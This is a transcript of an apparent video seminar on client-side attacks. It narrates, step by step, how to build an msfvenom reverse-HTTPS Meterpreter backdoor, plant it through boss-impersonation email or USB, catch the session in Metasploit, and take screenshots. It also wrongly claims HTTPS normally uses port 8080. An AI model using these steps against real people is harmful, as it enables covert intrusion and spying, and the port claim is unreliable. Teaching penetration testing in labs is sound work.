Hi, today we will discuss about client-side attacks. As a penetration tester, you want to see if a server or a computer is vulnerable. It's better to do a server-side attack when exploiting the machine, but there are times that you have difficulty in exploiting the machine. For example, server-side security measures are in place, among others. Then the next resort is to do a client-side attack. This attack requires the user to do something. For example, they will open a link or download a file or execute a file. Once they do that, we will be able to run a code and achieve our goal. But because it requires user interaction, information gathering is very important. We need to do social engineering with the target user. For example, if we want him to run a code, we can do it by sending an email with a video file that is actually an executable file. We will have to set it up in a way that the email looks like it comes from his boss telling him to check the PDF file. This is just one way in order for us to get our code installed or run in his computer. So we have to create our own backdoor. What is a backdoor? A backdoor provides access to a system that bypasses an organization's normal authentication mechanisms. Cybercriminals who theoretically lack access to legitimate accounts on an organization's systems can use it to remotely access corporate systems. A backdoor is simply a program or an executable file but what makes it special is that it contains a payload. What is a payload? Payload is specifically made to do what the hacker wants to do. In creating a payload, there are two communication directions. One is bind or direct and the other is reverse. In the direct communication, for example, this is our target machine and this is the hacker computer. The backdoor will open a port in the target machine. And then, once it's open, the hacker can uh, access the computer via the port. But the problem with that is that opening a port in the target computer could potentially raise a lot of alarms, especially if there are softwares installed by your system administrator to check what are the ports being opened. However, if we will go with the reverse communication, instead of opening a port in the target machine, we open a port in our machine or in the hacker's machine. And then when our backdoor will be executed here in our target machine, the backdoor will connect to our computer or the hacker's computer. So in that scenario, there is no alarm being set in the target computer because the port that is open is in our or is in the hacker's computer. So there will be no suspicion, especially if the port to be used is 8080, because the target computer, the user on the target computer usually use uh, the computer to open websites in which the protocol used for that is uh, the HTTPS and it connects to the port 8080. And so that is exactly what we are going to do. We will create a backdoor with a payload using the port 8080. In the next video, I will show you how we can do that. Okay, so we are now in the demo portion of our seminar. I will show you a demo on how hackers may use backdoor to attack the target. Tools to be used: Msfvenom, social engineering, and Metasploit. Now we will first talk about Msfvenom. So I have here a Kali machine. First, you will check the structure of Msfvenom. So you will type Msfvenom dash dash help to see how it is being structured and what are the options. So Msfvenom, a Metasploit standalone payload generator. So we have here option dash L, or you can also use dash dash list and then followed by the type to list all the modules for the type. So for example, if we are interested on payloads, so we can type msfvenom dash L, or again you can also use dash dash list. It's just the same, dash L, and then the type, which is payloads. So if you press enter, it will show you all the different payloads that we will put less so that we will have a page down. It will take a while because the list is quite big, but once you have it, we can see what are the payloads, and so we can use a specific payload for a specific device. For example, okay, so here we can have a payload for Android, see, and for Linux, then we have for Linux, for Unix, for Windows. So there's a lot actually. Now we are interested on the payload that is the uh, Windows meter return reverse HTTPS. This is the payload that we are interested in. So to use that, we'll type msf venom, then we will use the dash p, or the dash payload. We say dash dash payload, and then the payload, which is Windows meter reverse HTTPS. Now there are options within the payload that we need to set, but we to check what are the options, you can use dash dash list options. This one, dash dash list options. So if I will enter this, we will see the different uh, options that we need to set. Now there's a long list here for the advanced options, but these options are not really mandatory. So for example, so you have this option, and this is the meaning of that option. But we are interested on the basic options because this is what we need. As you can see, there are fields that are required, and some of the fields have values, like exit func, they have value, but the L host has no value, so we need to supply the value. How are we going to do that? I'll uh, I'll make another terminal here. Okay, so msf venom dash dash payload Windows interpreter reverse HTTPS, and then we will set the we will set the lhost. To do that, so lhost equals, then now since this Kali Linux is the machine that we are going to make as the computer that we'll listen to. So this is the IP address that we need. As you can see here, lhost description, the local listener host. So this machine I am using right now will be our listener. Now we need to put the IP address. Do that. Let's check the IP config. So the IP address is 192.168.1.13. Copy this and paste it here. Okay. And then, although we have the L port here, which is the local listener port, we will change that because we will be using the 8080 is in which the HTTPS is using is normally will normally use that port. So to change, we have L port equals 8080, and then after that we need to since we need to create a backdoor, it means we need to create a file. Now the next option that you will put in your command is the format. So the format of your file. So since we will put this in the Windows machine, that will be an XC format. So dash F, then XC, and then we will put it or save it in a file. So we will be using the dash O or dash dash out argument to save it on a file. So dash dash out, and let's say backdoor.exe. So again, before we will press enter, so we have the Msfvenom command, dash dash payload, and then specify the payload that you will be using. And then based on the options, we need to set the lhost. So we have our IP address. And then we have the L port. Again, I use 8080 instead of the default that we found earlier because HTTPS usually, or the normal port in which HTTPS use is 8080. So the target computer, if it has some security measures, it will not know that the computer is connecting to uh, hacker machine because 8080 is a normal operation for a user to open or visit a website in which it uses the port 8080. So then we will press enter. Okay, so it is now creating a file. So save as backdoor.exe. This file is very obvious, but this is just for educational purposes, just to demonstrate. Of course, hackers doesn't use backdoor.exe because that is very obvious. They will use a different file name. So now this is already saved in our file. So in our computer. So if we will open here, backdoor.exe. Now this backdoor.exe, you will now use the social engineering part so that you will be able to transfer this file to the target computer. Now there will be a lot there's a lot of ways to do that. First, you can just go to the computer if the user is not using it or is away from the computer. You can go to the computer, put your flash drive, and then uh, transfer your file. Or you can also devise a plan to email the user and you acting like the boss, and then uh, let the user download the file. And there are also other ways so that this backdoor.exe will be uh, hidden. Like we can in our other seminar, I will talk about how to make this exe file look like a PDF file or even an image. So there are ways to do that. And on the social engineering part, there are also other ways to achieve the objective. So that's it for now, and then we will continue with the next stage, the Metasploit. Okay, so after we created our backdoor using the Msfvenom command, it's time to do the social engineering. As I've said, there are a lot of ways to achieve the goal. For hackers nowadays are very creative. So one way to do the to do this is, for example, the hacker will pose as the boss of the user. Then the hacker will send an email using the boss email address and instructing the user to download the file and run it, that kind of sort. Or uh, there are other ways. Uh, Again, hackers are very creative in doing that. So we will not discuss or we will not delve into that one, but rather we will go directly to Metasploit. So let's assume that the user has already the uh, file in his computer. For example, the user using a Windows and the file is already here. Now, on the hacker side, what the hacker will do is make his computer listen, open the port and listen to incoming communication. So, because once the user will double click this one, a communication will be created from this computer to the hacker's computer. So, the hacker should open his port and wait for any communication. So to do that, hacker will run the Metasploit. The command is sudo msf console. Press enter. I am using Metasploit 6.4.30. Okay, so we have here our MSF prompt. First is we will use a module, but we don't know the exact module, so we will search. We have our keyword, which is multi-handler. Let's see. So there are a lot of modules related to that one. We are interested on this one. So that is number 7. You will type use 7. Okay. Now to see the options, what are the things to be set, you will type options. So you can see first we have payload option. This is not the payload that we use when we created the backdoor.exe. So we will change that one. Set payload. We use the Windows Meterpreter reverse HTTPS. Okay. Then we also need to set the lhost. So let's see options again. Okay. So we have lhost and lport. So we set lhost 192.168.1.13. 13 because this is the computer uh, ifconfig. So this computer is 1.13 and we will use this computer to listen to or listen on when there's a communication from the target computer. So we set that. And then, although L port has a value already, but if you remember, we use the port 8080. So we set that to port 8080. L port 8080. Let's check the options again. So we have the payload option. We have the L host. We have the L port. Now we can run the exploit. Okay, so now that we have run our exploit, so when somebody is clicking it to run, so let's just suppose that somebody clicks and run the file. So in here, in the hacker's machine, he can see that there's already a communication. So meterpreter session 1 open. Now if we type sysinfo, we will know that we are now inside the computer. See, Windows 7, junk PC, and if we will type help, so you can see there are a lot of commands we can use. Cut, read the contents of a file to the screen, CD, check RAM. Here's an interesting one. Let me see. Screenshot. Grab a screenshot of the interactive desktop. So for example, the user is, let's just say, browsing something. Let's say picture. Okay, pictures. So if the hacker will type screenshot, screenshot saved to home Felix JQ. Okay, so we click this one, home JQ. Here, see? So that is a screenshot from this computer. So the user did not know that somebody already made a screenshot of his desktop. So just imagine how scary is that. There's also other commands. Uh, like get system, play a waveform, even webcam. Although my virtual machine doesn't have a webcam, so we cannot demonstrate this one, but it's just the same as getting a screenshot. See, it's very scary. So that's all for this demo. Thank you.